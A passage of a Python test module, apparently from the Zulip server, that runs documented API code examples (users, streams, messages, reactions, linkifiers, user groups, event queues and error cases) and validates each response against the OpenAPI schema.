validate_against_openapi_schema(result, "/users", "get", "200")
members = [m for m in result["members"] if m["email"] == "[email protected]"]
assert len(members) == 1
newbie = members[0]
assert not newbie["is_admin"]
assert newbie["full_name"] == "New User"
# {code_example|start}
# You may pass the `client_gravatar` query parameter as follows:
result = client.get_members({"client_gravatar": True})
# {code_example|end}
validate_against_openapi_schema(result, "/users", "get", "200")
assert result["members"][0]["avatar_url"] is None
# {code_example|start}
# You may pass the `include_custom_profile_fields` query parameter as follows:
result = client.get_members({"include_custom_profile_fields": True})
# {code_example|end}
validate_against_openapi_schema(result, "/users", "get", "200")
for member in result["members"]:
if member["is_bot"]:
assert member.get("profile_data", None) is None
else:
assert member.get("profile_data", None) is not None
@openapi_test_function("/users/{email}:get")
def get_user_by_email(client: Client) -> None:
# {code_example|start}
# Fetch details on a user given a user ID
email = "[email protected]"
result = client.call_endpoint(
url=f"/users/{email}",
method="GET",
)
# {code_example|end}
validate_against_openapi_schema(result, "/users/{email}", "get", "200")
@openapi_test_function("/users/{user_id}:get")
def get_single_user(client: Client) -> None:
# {code_example|start}
# Fetch details on a user given a user ID
user_id = 8
result = client.get_user_by_id(user_id)
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id}", "get", "200")
# {code_example|start}
# If you'd like data on custom profile fields, you can request them as follows:
result = client.get_user_by_id(user_id, include_custom_profile_fields=True)
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id}", "get", "200")
@openapi_test_function("/users/{user_id}:delete")
def deactivate_user(client: Client) -> None:
# {code_example|start}
# Deactivate a user
user_id = 8
result = client.deactivate_user_by_id(user_id)
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id}", "delete", "200")
@openapi_test_function("/users/{user_id}/reactivate:post")
def reactivate_user(client: Client) -> None:
# {code_example|start}
# Reactivate a user
user_id = 8
result = client.reactivate_user_by_id(user_id)
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id}/reactivate", "post", "200")
@openapi_test_function("/users/{user_id}:patch")
def update_user(client: Client) -> None:
# {code_example|start}
# Change a user's full name.
user_id = 10
result = client.update_user_by_id(user_id, full_name="New Name")
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id}", "patch", "200")
# {code_example|start}
# Change value of the custom profile field with ID 9.
user_id = 8
result = client.update_user_by_id(user_id, profile_data=[{"id": 9, "value": "some data"}])
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id}", "patch", "400")
@openapi_test_function("/users/{user_id}/subscriptions/{stream_id}:get")
def get_subscription_status(client: Client) -> None:
# {code_example|start}
# Check whether a user is a subscriber to a given stream.
user_id = 7
stream_id = 1
result = client.call_endpoint(
url=f"/users/{user_id}/subscriptions/{stream_id}",
method="GET",
)
# {code_example|end}
validate_against_openapi_schema(
result, "/users/{user_id}/subscriptions/{stream_id}", "get", "200"
)
@openapi_test_function("/realm/linkifiers:get")
def get_realm_linkifiers(client: Client) -> None:
# {code_example|start}
# Fetch all the filters in this organization
result = client.call_endpoint(
url="/realm/linkifiers",
method="GET",
)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/linkifiers", "get", "200")
@openapi_test_function("/realm/profile_fields:get")
def get_realm_profile_fields(client: Client) -> None:
# {code_example|start}
# Fetch all the custom profile fields in the user's organization.
result = client.call_endpoint(
url="/realm/profile_fields",
method="GET",
)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/profile_fields", "get", "200")
@openapi_test_function("/realm/profile_fields:patch")
def reorder_realm_profile_fields(client: Client) -> None:
# {code_example|start}
# Reorder the custom profile fields in the user's organization.
order = [8, 7, 6, 5, 4, 3, 2, 1]
request = {"order": json.dumps(order)}
result = client.call_endpoint(url="/realm/profile_fields", method="PATCH", request=request)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/profile_fields", "patch", "200")
@openapi_test_function("/realm/profile_fields:post")
def create_realm_profile_field(client: Client) -> None:
# {code_example|start}
# Create a custom profile field in the user's organization.
request = {"name": "Phone", "hint": "Contact No.", "field_type": 1}
result = client.call_endpoint(url="/realm/profile_fields", method="POST", request=request)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/profile_fields", "post", "200")
@openapi_test_function("/realm/filters:post")
def add_realm_filter(client: Client) -> None:
# {code_example|start}
# Add a filter to automatically linkify #<number> to the corresponding
# issue in Zulip's server repo
result = client.add_realm_filter(
"#(?P<id>[0-9]+)", "https://github.com/zulip/zulip/issues/%(id)s"
)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/filters", "post", "200")
@openapi_test_function("/realm/filters/{filter_id}:patch")
def update_realm_filter(client: Client) -> None:
# {code_example|start}
# Update the linkifier (realm_filter) with ID 1
filter_id = 1
request = {
"pattern": "#(?P<id>[0-9]+)",
"url_format_string": "https://github.com/zulip/zulip/issues/%(id)s",
}
result = client.call_endpoint(
url=f"/realm/filters/{filter_id}", method="PATCH", request=request
)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/filters/{filter_id}", "patch", "200")
@openapi_test_function("/realm/filters/{filter_id}:delete")
def remove_realm_filter(client: Client) -> None:
# {code_example|start}
# Remove the linkifier (realm_filter) with ID 1
result = client.remove_realm_filter(1)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/filters/{filter_id}", "delete", "200")
@openapi_test_function("/realm/playgrounds:post")
def add_realm_playground(client: Client) -> None:
# {code_example|start}
# Add a realm playground for Python
request = {
"name": "Python playground",
"pygments_language": "Python",
"url_prefix": "https://python.example.com",
}
result = client.call_endpoint(url="/realm/playgrounds", method="POST", request=request)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/playgrounds", "post", "200")
@openapi_test_function("/realm/playgrounds/{playground_id}:delete")
def remove_realm_playground(client: Client) -> None:
# {code_example|start}
# Remove the playground with ID 1
result = client.call_endpoint(url="/realm/playgrounds/1", method="DELETE")
# {code_example|end}
validate_against_openapi_schema(result, "/realm/playgrounds/{playground_id}", "delete", "200")
@openapi_test_function("/users/me:get")
def get_profile(client: Client) -> None:
# {code_example|start}
# Get the profile of the user/bot that requests this endpoint,
# which is `client` in this case:
result = client.get_profile()
# {code_example|end}
validate_against_openapi_schema(result, "/users/me", "get", "200")
@openapi_test_function("/users/me:delete")
def deactivate_own_user(client: Client, owner_client: Client) -> None:
user_id = client.get_profile()["user_id"]
# {code_example|start}
# Deactivate the account of the current user/bot that requests.
result = client.call_endpoint(
url="/users/me",
method="DELETE",
)
# {code_example|end}
# Reactivate the account to avoid polluting other tests.
owner_client.reactivate_user_by_id(user_id)
validate_against_openapi_schema(result, "/users/me", "delete", "200")
@openapi_test_function("/get_stream_id:get")
def get_stream_id(client: Client) -> int:
# {code_example|start}
# Get the ID of a given stream
stream_name = "new stream"
result = client.get_stream_id(stream_name)
# {code_example|end}
validate_against_openapi_schema(result, "/get_stream_id", "get", "200")
return result["stream_id"]
@openapi_test_function("/streams/{stream_id}:delete")
def archive_stream(client: Client, stream_id: int) -> None:
result = client.add_subscriptions(
streams=[
{
"name": "stream to be archived",
"description": "New stream for testing",
},
],
)
# {code_example|start}
# Archive the stream named 'stream to be archived'
stream_id = client.get_stream_id("stream to be archived")["stream_id"]
result = client.delete_stream(stream_id)
# {code_example|end}
validate_against_openapi_schema(result, "/streams/{stream_id}", "delete", "200")
assert result["result"] == "success"
@openapi_test_function("/streams:get")
def get_streams(client: Client) -> None:
# {code_example|start}
# Get all streams that the user has access to
result = client.get_streams()
# {code_example|end}
validate_against_openapi_schema(result, "/streams", "get", "200")
streams = [s for s in result["streams"] if s["name"] == "new stream"]
assert streams[0]["description"] == "New stream for testing"
# {code_example|start}
# You may pass in one or more of the query parameters mentioned above
# as keyword arguments, like so:
result = client.get_streams(include_public=False)
# {code_example|end}
validate_against_openapi_schema(result, "/streams", "get", "200")
assert len(result["streams"]) == 4
@openapi_test_function("/streams/{stream_id}:patch")
def update_stream(client: Client, stream_id: int) -> None:
# {code_example|start}
# Update the stream by a given ID
request = {
"stream_id": stream_id,
"stream_post_policy": 2,
"is_private": True,
}
result = client.update_stream(request)
# {code_example|end}
validate_against_openapi_schema(result, "/streams/{stream_id}", "patch", "200")
assert result["result"] == "success"
@openapi_test_function("/user_groups:get")
def get_user_groups(client: Client) -> int:
# {code_example|start}
# Get all user groups of the realm
result = client.get_user_groups()
# {code_example|end}
validate_against_openapi_schema(result, "/user_groups", "get", "200")
hamlet_user_group = [u for u in result["user_groups"] if u["name"] == "hamletcharacters"][0]
assert hamlet_user_group["description"] == "Characters of Hamlet"
marketing_user_group = [u for u in result["user_groups"] if u["name"] == "marketing"][0]
return marketing_user_group["id"]
def test_user_not_authorized_error(nonadmin_client: Client) -> None:
result = nonadmin_client.get_streams(include_all_active=True)
validate_against_openapi_schema(result, "/rest-error-handling", "post", "400_2")
def get_subscribers(client: Client) -> None:
result = client.get_subscribers(stream="new stream")
assert result["subscribers"] == ["[email protected]", "[email protected]"]
def get_user_agent(client: Client) -> None:
result = client.get_user_agent()
assert result.startswith("ZulipPython/")
@openapi_test_function("/users/me/subscriptions:get")
def list_subscriptions(client: Client) -> None:
# {code_example|start}
# Get all streams that the user is subscribed to
result = client.list_subscriptions()
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions", "get", "200")
streams = [s for s in result["subscriptions"] if s["name"] == "new stream"]
assert streams[0]["description"] == "New stream for testing"
@openapi_test_function("/users/me/subscriptions:delete")
def remove_subscriptions(client: Client) -> None:
# {code_example|start}
# Unsubscribe from the stream "new stream"
result = client.remove_subscriptions(
["new stream"],
)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions", "delete", "200")
# test it was actually removed
result = client.list_subscriptions()
assert result["result"] == "success"
streams = [s for s in result["subscriptions"] if s["name"] == "new stream"]
assert len(streams) == 0
# {code_example|start}
# Unsubscribe another user from the stream "new stream"
result = client.remove_subscriptions(
["new stream"],
principals=["[email protected]"],
)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions", "delete", "200")
@openapi_test_function("/users/me/subscriptions/muted_topics:patch")
def toggle_mute_topic(client: Client) -> None:
# Send a test message
message = {
"type": "stream",
"to": "Denmark",
"topic": "boat party",
}
client.call_endpoint(
url="messages",
method="POST",
request=message,
)
# {code_example|start}
# Mute the topic "boat party" in the stream "Denmark"
request = {
"stream": "Denmark",
"topic": "boat party",
"op": "add",
}
result = client.mute_topic(request)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions/muted_topics", "patch", "200")
# {code_example|start}
# Unmute the topic "boat party" in the stream "Denmark"
request = {
"stream": "Denmark",
"topic": "boat party",
"op": "remove",
}
result = client.mute_topic(request)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions/muted_topics", "patch", "200")
@openapi_test_function("/users/me/muted_users/{muted_user_id}:post")
def add_user_mute(client: Client) -> None:
ensure_users([10], ["hamlet"])
# {code_example|start}
# Mute user with ID 10
muted_user_id = 10
result = client.call_endpoint(url=f"/users/me/muted_users/{muted_user_id}", method="POST")
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/muted_users/{muted_user_id}", "post", "200")
@openapi_test_function("/users/me/muted_users/{muted_user_id}:delete")
def remove_user_mute(client: Client) -> None:
ensure_users([10], ["hamlet"])
# {code_example|start}
# Unmute user with ID 10
muted_user_id = 10
result = client.call_endpoint(url=f"/users/me/muted_users/{muted_user_id}", method="DELETE")
# {code_example|end}
validate_against_openapi_schema(
result, "/users/me/muted_users/{muted_user_id}", "delete", "200"
)
@openapi_test_function("/mark_all_as_read:post")
def mark_all_as_read(client: Client) -> None:
# {code_example|start}
# Mark all of the user's unread messages as read
result = client.mark_all_as_read()
# {code_example|end}
validate_against_openapi_schema(result, "/mark_all_as_read", "post", "200")
@openapi_test_function("/mark_stream_as_read:post")
def mark_stream_as_read(client: Client) -> None:
# {code_example|start}
# Mark the unread messages in stream with ID "1" as read
result = client.mark_stream_as_read(1)
# {code_example|end}
validate_against_openapi_schema(result, "/mark_stream_as_read", "post", "200")
@openapi_test_function("/mark_topic_as_read:post")
def mark_topic_as_read(client: Client) -> None:
# Grab an existing topic name
topic_name = client.get_stream_topics(1)["topics"][0]["name"]
# {code_example|start}
# Mark the unread messages in stream 1's topic "topic_name" as read
result = client.mark_topic_as_read(1, topic_name)
# {code_example|end}
validate_against_openapi_schema(result, "/mark_stream_as_read", "post", "200")
@openapi_test_function("/users/me/subscriptions/properties:post")
def update_subscription_settings(client: Client) -> None:
# {code_example|start}
# Update the user's subscription in stream #1 to pin it to the top of the
# stream list; and in stream #3 to have the hex color "f00"
request = [
{
"stream_id": 1,
"property": "pin_to_top",
"value": True,
},
{
"stream_id": 3,
"property": "color",
"value": "#f00f00",
},
]
result = client.update_subscription_settings(request)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions/properties", "POST", "200")
@openapi_test_function("/messages/render:post")
def render_message(client: Client) -> None:
# {code_example|start}
# Render a message
request = {
"content": "**foo**",
}
result = client.render_message(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/render", "post", "200")
@openapi_test_function("/messages:get")
def get_messages(client: Client) -> None:
# {code_example|start}
# Get the 100 last messages sent by "[email protected]" to the stream "Verona"
request: Dict[str, Any] = {
"anchor": "newest",
"num_before": 100,
"num_after": 0,
"narrow": [
{"operator": "sender", "operand": "[email protected]"},
{"operator": "stream", "operand": "Verona"},
],
}
result = client.get_messages(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages", "get", "200")
assert len(result["messages"]) <= request["num_before"]
@openapi_test_function("/messages/matches_narrow:get")
def check_messages_match_narrow(client: Client) -> None:
message = {"type": "stream", "to": "Verona", "topic": "test_topic", "content": "http://foo.com"}
msg_ids = []
response = client.send_message(message)
msg_ids.append(response["id"])
message["content"] = "no link here"
response = client.send_message(message)
msg_ids.append(response["id"])
# {code_example|start}
# Check which messages within an array match a narrow.
request = {
"msg_ids": msg_ids,
"narrow": [{"operator": "has", "operand": "link"}],
}
result = client.call_endpoint(url="messages/matches_narrow", method="GET", request=request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/matches_narrow", "get", "200")
@openapi_test_function("/messages/{message_id}:get")
def get_raw_message(client: Client, message_id: int) -> None:
assert int(message_id)
# {code_example|start}
# Get the raw content of the message with ID "message_id"
result = client.get_raw_message(message_id)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/{message_id}", "get", "200")
@openapi_test_function("/attachments:get")
def get_attachments(client: Client) -> None:
# {code_example|start}
# Get your attachments.
result = client.get_attachments()
# {code_example|end}
validate_against_openapi_schema(result, "/attachments", "get", "200")
@openapi_test_function("/messages:post")
def send_message(client: Client) -> int:
request: Dict[str, Any] = {}
# {code_example|start}
# Send a stream message
request = {
"type": "stream",
"to": "Denmark",
"topic": "Castle",
"content": "I come not, friends, to steal away your hearts.",
}
result = client.send_message(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages", "post", "200")
# test that the message was actually sent
message_id = result["id"]
url = "messages/" + str(message_id)
result = client.call_endpoint(
url=url,
method="GET",
)
assert result["result"] == "success"
assert result["raw_content"] == request["content"]
ensure_users([10], ["hamlet"])
# {code_example|start}
# Send a private message
user_id = 10
request = {
"type": "private",
"to": [user_id],
"content": "With mirth and laughter let old wrinkles come.",
}
result = client.send_message(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages", "post", "200")
# test that the message was actually sent
message_id = result["id"]
url = "messages/" + str(message_id)
result = client.call_endpoint(
url=url,
method="GET",
)
assert result["result"] == "success"
assert result["raw_content"] == request["content"]
return message_id
@openapi_test_function("/messages/{message_id}/reactions:post")
def add_reaction(client: Client, message_id: int) -> None:
request: Dict[str, Any] = {}
# {code_example|start}
# Add an emoji reaction
request = {
"message_id": message_id,
"emoji_name": "octopus",
}
result = client.add_reaction(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/{message_id}/reactions", "post", "200")
@openapi_test_function("/messages/{message_id}/reactions:delete")
def remove_reaction(client: Client, message_id: int) -> None:
request: Dict[str, Any] = {}
# {code_example|start}
# Remove an emoji reaction
request = {
"message_id": message_id,
"emoji_name": "octopus",
}
result = client.remove_reaction(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/{message_id}/reactions", "delete", "200")
def test_nonexistent_stream_error(client: Client) -> None:
request = {
"type": "stream",
"to": "nonexistent_stream",
"topic": "Castle",
"content": "I come not, friends, to steal away your hearts.",
}
result = client.send_message(request)
validate_against_openapi_schema(result, "/messages", "post", "400_0")
def test_private_message_invalid_recipient(client: Client) -> None:
request = {
"type": "private",
"to": "[email protected]",
"content": "With mirth and laughter let old wrinkles come.",
}
result = client.send_message(request)
validate_against_openapi_schema(result, "/messages", "post", "400_1")
@openapi_test_function("/messages/{message_id}:patch")
def update_message(client: Client, message_id: int) -> None:
assert int(message_id)
# {code_example|start}
# Edit a message
# (make sure that message_id below is set to the ID of the
# message you wish to update)
request = {
"message_id": message_id,
"content": "New content",
}
result = client.update_message(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/{message_id}", "patch", "200")
# test it was actually updated
url = "messages/" + str(message_id)
result = client.call_endpoint(
url=url,
method="GET",
)
assert result["result"] == "success"
assert result["raw_content"] == request["content"]
def test_update_message_edit_permission_error(client: Client, nonadmin_client: Client) -> None:
request = {
"type": "stream",
"to": "Denmark",
"topic": "Castle",
"content": "I come not, friends, to steal away your hearts.",
}
result = client.send_message(request)
request = {
"message_id": result["id"],
"content": "New content",
}
result = nonadmin_client.update_message(request)
validate_against_openapi_schema(result, "/messages/{message_id}", "patch", "400")
@openapi_test_function("/messages/{message_id}:delete")
def delete_message(client: Client, message_id: int) -> None:
# {code_example|start}
# Delete the message with ID "message_id"
result = client.delete_message(message_id)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/{message_id}", "delete", "200")
def test_delete_message_edit_permission_error(client: Client, nonadmin_client: Client) -> None:
request = {
"type": "stream",
"to": "Denmark",
"topic": "Castle",
"content": "I come not, friends, to steal away your hearts.",
}
result = client.send_message(request)
result = nonadmin_client.delete_message(result["id"])
validate_against_openapi_schema(result, "/messages/{message_id}", "delete", "400_1")
@openapi_test_function("/messages/{message_id}/history:get")
def get_message_history(client: Client, message_id: int) -> None:
# {code_example|start}
# Get the edit history for message with ID "message_id"
result = client.get_message_history(message_id)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/{message_id}/history", "get", "200")
@openapi_test_function("/realm/emoji:get")
def get_realm_emoji(client: Client) -> None:
# {code_example|start}
result = client.get_realm_emoji()
# {code_example|end}
validate_against_openapi_schema(result, "/realm/emoji", "GET", "200")
@openapi_test_function("/messages/flags:post")
def update_message_flags(client: Client) -> None:
# Send a few test messages
request: Dict[str, Any] = {
"type": "stream",
"to": "Denmark",
"topic": "Castle",
"content": "I come not, friends, to steal away your hearts.",
}
message_ids = []
for i in range(0, 3):
message_ids.append(client.send_message(request)["id"])
# {code_example|start}
# Add the "read" flag to the messages with IDs in "message_ids"
request = {
"messages": message_ids,
"op": "add",
"flag": "read",
}
result = client.update_message_flags(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/flags", "post", "200")
# {code_example|start}
# Remove the "starred" flag from the messages with IDs in "message_ids"
request = {
"messages": message_ids,
"op": "remove",
"flag": "starred",
}
result = client.update_message_flags(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/flags", "post", "200")
def register_queue_all_events(client: Client) -> str:
# Register the queue and get all events
# Mainly for verifying schema of /register.
result = client.register()
validate_against_openapi_schema(result, "/register", "post", "200")
return result["queue_id"]
@openapi_test_function("/register:post")
def register_queue(client: Client) -> str:
# {code_example|start}
# Register the queue
result = client.register(
event_types=["message", "realm_emoji"],
)
# {code_example|end}
validate_against_openapi_schema(result, "/register", "post", "200")
return result["queue_id"]
@openapi_test_function("/events:delete")
def deregister_queue(client: Client, queue_id: str) -> None:
# {code_example|start}
# Delete a queue (queue_id is the ID of the queue
# to be removed)
result = client.deregister(queue_id)
# {code_example|end}
validate_against_openapi_schema(result, "/events", "delete", "200")
# Test "BAD_EVENT_QUEUE_ID" error
result = client.deregister(queue_id)
validate_against_openapi_schema(result, "/events", "delete", "400")
@openapi_test_function("/server_settings:get")
def get_server_settings(client: Client) -> None:
# {code_example|start}
# Fetch the settings for this server
result = client.get_server_settings()
# {code_example|end}
validate_against_openapi_schema(result, "/server_settings", "get", "200")
@openapi_test_function("/settings/notifications:patch")
def update_notification_settings(client: Client) -> None:
# {code_example|start}
# Enable push notifications even when online
request = {
"enable_offline_push_notifications": True,
"enable_online_push_notifications": True,
}
result = client.update_notification_settings(request)
# {code_example|end}
validate_against_openapi_schema(result, "/settings/notifications", "patch", "200")
@openapi_test_function("/settings/display:patch")
def update_display_settings(client: Client) -> None:
# {code_example|start}
# Show user list on left sidebar in narrow windows.
# Change emoji set used for display to Google modern.
request = {
"left_side_userlist": True,
"emojiset": '"google"',
}
result = client.call_endpoint("settings/display", method="PATCH", request=request)
# {code_example|end}
validate_against_openapi_schema(result, "/settings/display", "patch", "200")
@openapi_test_function("/user_uploads:post")
def upload_file(client: Client) -> None:
path_to_file = os.path.join(ZULIP_DIR, "zerver", "tests", "images", "img.jpg")
# {code_example|start}
# Upload a file
with open(path_to_file, "rb") as fp:
result = client.upload_file(fp)
# Share the file by including it in a message.
client.send_message(
{
"type": "stream",
"to": "Denmark",
"topic": "Castle",
"content": "Check out [this picture]({}) of my castle!".format(result["uri"]),
}
)
# {code_example|end}
validate_against_openapi_schema(result, "/user_uploads", "post", "200")
@openapi_test_function("/users/me/{stream_id}/topics:get")
def get_stream_topics(client: Client, stream_id: int) -> None:
# {code_example|start}
result = client.get_stream_topics(stream_id)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/{stream_id}/topics", "get", "200")
@openapi_test_function("/typing:post")
def set_typing_status(client: Client) -> None:
ensure_users([10, 11], ["hamlet", "iago"])
# {code_example|start}
# The user has started to type in the group PM with Iago and Polonius
user_id1 = 10
user_id2 = 11
request = {
"op": "start",
"to": [user_id1, user_id2],
}
result = client.set_typing_status(request)
# {code_example|end}
validate_against_openapi_schema(result, "/typing", "post", "200")
# {code_example|start}
# The user has finished typing in the group PM with Iago and Polonius
user_id1 = 10
user_id2 = 11
request = {
"op": "stop",
"to": [user_id1, user_id2],
}
result = client.set_typing_status(request)
# {code_example|end}
validate_against_openapi_schema(result, "/typing", "post", "200")
# {code_example|start}
# The user has started to type in topic "typing status" of stream "Denmark"
stream_id = client.get_stream_id("Denmark")["stream_id"]
topic = "typing status"
request = {
"type": "stream",
"op": "start",
"to": [stream_id],
"topic": topic,
}
result = client.set_typing_status(request)
# {code_example|end}
validate_against_openapi_schema(result, "/typing", "post", "200")
# {code_example|start}
# The user has finished typing in topic "typing status" of stream "Denmark"
stream_id = client.get_stream_id("Denmark")["stream_id"]
topic = "typing status"
request = {
"type": "stream",
"op": "stop",
"to": [stream_id],
"topic": topic,
}
result = client.set_typing_status(request)
# {code_example|end}
validate_against_openapi_schema(result, "/typing", "post", "200")
@openapi_test_function("/realm/emoji/{emoji_name}:post")
def upload_custom_emoji(client: Client) -> None:
emoji_path = os.path.join(ZULIP_DIR, "zerver", "tests", "images", "img.jpg")
# {code_example|start}
# Upload a custom emoji; assume `emoji_path` is the path to your image.
with open(emoji_path, "rb") as fp:
emoji_name = "my_custom_emoji"
result = client.call_endpoint(
f"realm/emoji/{emoji_name}",
method="POST",
files=[fp],
)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/emoji/{emoji_name}", "post", "200")
@openapi_test_function("/users/me/alert_words:get")
def get_alert_words(client: Client) -> None:
result = client.get_alert_words()
assert result["result"] == "success"
@openapi_test_function("/users/me/alert_words:post")
def add_alert_words(client: Client) -> None:
word = ["foo", "bar"]
result = client.add_alert_words(word)
assert result["result"] == "success"
@openapi_test_function("/users/me/alert_words:delete")
def remove_alert_words(client: Client) -> None:
word = ["foo"]
result = client.remove_alert_words(word)
assert result["result"] == "success"
@openapi_test_function("/user_groups/create:post")
def create_user_group(client: Client) -> None:
ensure_users([6, 7, 8, 10], ["aaron", "zoe", "cordelia", "hamlet"])
# {code_example|start}
request = {
"name": "marketing",
"description": "The marketing team.",
"members": [6, 7, 8, 10],
}
result = client.create_user_group(request)
# {code_example|end}
validate_against_openapi_schema(result, "/user_groups/create", "post", "200")
assert result["result"] == "success"
@openapi_test_function("/user_groups/{user_group_id}:patch")
def update_user_group(client: Client, user_group_id: int) -> None:
# {code_example|start}
request = {
"group_id": user_group_id,
"name": "marketing",
"description": "The marketing team.",
}
result = client.update_user_group(request)
# {code_example|end}
assert result["result"] == "success"
@openapi_test_function("/user_groups/{user_group_id}:delete")
def remove_user_group(client: Client, user_group_id: int) -> None:
# {code_example|start}
result = client.remove_user_group(user_group_id)
# {code_example|end}
validate_against_openapi_schema(result, "/user_groups/{user_group_id}", "delete", "200")
assert result["result"] == "success"
@openapi_test_function("/user_groups/{user_group_id}/members:post")
def update_user_group_members(client: Client, user_group_id: int) -> None:
ensure_users([8, 10, 11], ["cordelia", "hamlet", "iago"])
# {code_example|start}
request = {
"delete": [8, 10],
"add": [11],
}
result = client.update_user_group_members(user_group_id, request)
# {code_example|end}
validate_against_openapi_schema(result, "/user_groups/{group_id}/members", "post", "200")
def test_invalid_api_key(client_with_invalid_key: Client) -> None:
result = client_with_invalid_key.list_subscriptions()
validate_against_openapi_schema(result, "/rest-error-handling", "post", "400_0")
def test_missing_request_argument(client: Client) -> None:
result = client.render_message({})
validate_against_openapi_schema(result, "/rest-error-handling", "post", "400_1")
def test_user_account_deactivated(client: Client) -> None:
request = {
"content": "**foo**",
}
result = client.render_message(request)
validate_against_openapi_schema(result, "/rest-error-handling", "post", "403_0")
def test_realm_deactivated(client: Client) -> None:
request = {
"content": "**foo**",
}
result = client.render_message(request)
validate_against_openapi_schema(result, "/rest-error-handling", "post", "403_1")
def test_invalid_stream_error(client: Client) -> None:
result = client.get_stream_id("nonexistent")
validate_against_openapi_schema(result, "/get_stream_id", "get", "400")
# SETUP METHODS FOLLOW
def test_against_fixture(
result: Dict[str, Any],
fixture: Dict[str, Any],
check_if_equal: Optional[Iterable[str]] = None,
check_if_exists: Optional[Iterable[str]] = None,
) -> None:
assertLength(result, fixture)
if check_if_equal is None and check_if_exists is None:
for key, value in fixture.items():
assertEqual(key, result, fixture)
if check_if_equal is not None:
for key in check_if_equal:
assertEqual(key, result, fixture)
if check_if_exists is not None:
for key in check_if_exists:
assertIn(key, result)
def assertEqual(key: str, result: Dict[str, Any], fixture: Dict[str, Any]) -> None:
if result[key] != fixture[key]:
first = f"{key} = {result[key]}"
second = f"{key} = {fixture[key]}"
raise AssertionError(
"Actual and expected outputs do not match; showing diff:\n"
+ mdiff.diff_strings(first, second)
)
else:
assert result[key] == fixture[key]
def assertLength(result: Dict[str, Any], fixture: Dict[str, Any]) -> None:
if len(result) != len(fixture):
result_string = json.dumps(result, indent=4, sort_keys=True)
fixture_string = json.dumps(fixture, indent=4, sort_keys=True)
raise AssertionError(
"The lengths of the actual and expected outputs do not match; showing diff:\n"
+ mdiff.diff_strings(result_string, fixture_string)
)
else:
assert len(result) == len(fixture)
def assertIn(key: str, result: Dict[str, Any]) -> None:
if key not in result.keys():
raise AssertionError(
f"The actual output does not contain the the key `{key}`.",
)
else:
assert key in result
def test_messages(client: Client, nonadmin_client: Client) -> None:
render_message(client)
message_id = send_message(client)
add_reaction(client, message_id)
remove_reaction(client, message_id)
update_message(client, message_id)
get_raw_message(client, message_id)
get_messages(client)
check_messages_match_narrow(client)
get_message_history(client, message_id)
delete_message(client, message_id)
mark_all_as_read(client)
mark_stream_as_read(client)
mark_topic_as_read(client)
update_message_flags(client)
test_nonexistent_stream_error(client)
test_private_message_invalid_recipient(client)
test_update_message_edit_permission_error(client, nonadmin_client)
test_delete_message_edit_permission_error(client, nonadmin_client)
def test_users(client: Client, owner_client: Client) -> None:
create_user(client)
get_members(client)
get_single_user(client)
deactivate_user(client)
reactivate_user(client)
update_user(client)
get_user_by_email(client)
get_subscription_status(client)
get_profile(client)
update_notification_settings(client)
update_display_settings(client)
upload_file(client)
get_attachments(client)
set_typing_status(client)
update_presence(client)
get_user_presence(client)
create_user_group(client)
user_group_id = get_user_groups(client)
update_user_group(client, user_group_id)
update_user_group_members(client, user_group_id)
remove_user_group(client, user_group_id)
get_alert_words(client)
add_alert_words(client)
remove_alert_words(client)
deactivate_own_user(client, owner_client)
add_user_mute(client)
remove_user_mute(client)
def test_streams(client: Client, nonadmin_client: Client) -> None:
add_subscriptions(client)
test_add_subscriptions_already_subscribed(client)
list_subscriptions(client)
stream_id = get_stream_id(client)
update_stream(client, stream_id)
get_streams(client)
get_subscribers(client)
remove_subscriptions(client)
toggle_mute_topic(client)
update_subscription_settings(client)
update_notification_settings(client)
get_stream_topics(client, 1)
archive_stream(client, stream_id)
test_user_not_authorized_error(nonadmin_client)
test_authorization_errors_fatal(client, nonadmin_client)
def test_queues(client: Client) -> None:
# Note that the example for api/get-events is not tested.
# Since, methods such as client.get_events() or client.call_on_each_message
# are blocking calls and since the event queue backend is already
# thoroughly tested in zerver/tests/test_event_queue.py, it is not worth
# the effort to come up with asynchronous logic for testing those here.
queue_id = register_queue(client)
deregister_queue(client, queue_id)
register_queue_all_events(client)
def test_server_organizations(client: Client) -> None:
get_realm_linkifiers(client)
add_realm_filter(client)
update_realm_filter(client)
add_realm_playground(client)
get_server_settings(client)
remove_realm_filter(client)
remove_realm_playground(client)
get_realm_emoji(client)
upload_custom_emoji(client)
get_realm_profile_fields(client)
reorder_realm_profile_fields(client)
create_realm_profile_field(client)
def test_errors(client: Client) -> None:
test_missing_request_argument(client)
test_invalid_stream_error(client)
def test_the_api(client: Client, nonadmin_client: Client, owner_client: Client) -> None:
get_user_agent(client)
test_users(client, owner_client)
